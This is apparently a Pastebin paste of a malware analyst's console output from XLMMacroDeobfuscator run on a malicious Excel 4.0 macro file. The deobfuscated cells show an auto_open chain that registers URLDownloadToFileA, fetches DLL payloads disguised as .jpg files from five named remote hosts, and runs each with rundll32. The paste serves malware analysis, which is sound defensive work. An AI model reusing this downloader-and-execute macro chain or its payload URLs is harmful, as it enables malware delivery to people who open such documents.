Advertisement
dissectmalware

interesting mal XLM

Jan 28th, 2021
1,502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.48 KB | None | 0 0
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\41289e01a9a971d5b7372a8bfa255ef2503ebbf8f2313223eae09ce4318e51b2
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\41289e01a9a971d5b7372a8bfa255ef2503ebbf8f2313223eae09ce4318e51b2
  24.  
  25. Unrecognized file format
  26. Unencrypted xls file
  27.  
  28. [Loading Cells]
  29. auto_open: auto_open->'Klops'!$A$154
  30. [Starting Deobfuscation]
  31. CELL:A154 , FullEvaluation , C153()
  32. CELL:C164 , FullEvaluation , GOTO(D153)
  33. CELL:D153 , FullEvaluation , =REGISTER("URLMon","URLDownloadToFileA","IICCBB","Niokaser",1,9)
  34. CELL:D154 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://finpremium.ru/jlbmvdewvq/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF",0,0)
  35. CELL:D155 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://toletnewchandigarh.com/dlhkadi/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF1",0,0)
  36. CELL:D156 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://digitalmarketingcourseinvadodara.com/bpskramhj/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF2",0,0)
  37. CELL:D157 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://nativewriters.us/buaknxamhmhb/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF3",0,0)
  38. CELL:D158 , PartialEvaluation , =URLMon.URLDownloadToFileA(0,"http://hiranandanirise.com/zezprnimexk/=<<Name #0 in external(?) file #2>>(111111.0,999999.0)&"".jpg""","..\GTOLS.BBDDFF4",0,0)
  39. CELL:D164 , FullEvaluation , GOTO(B153)
  40. CELL:B153 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF,DllRegisterServer")
  41. CELL:B154 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF1,DllRegisterServer")
  42. CELL:B155 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF2,DllRegisterServer")
  43. CELL:B156 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF3,DllRegisterServer")
  44. CELL:B157 , PartialEvaluation , =EXEC("rundll32 ..\GTOLS.BBDDFF4,DllRegisterServer")
  45. CELL:B164 , End , HALT()
  46.  
  47. Files:
  48.  
  49. [END of Deobfuscation]
  50. time elapsed: 0.5057058334350586
  51.  
  52. Process finished with exit code 0
  53.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement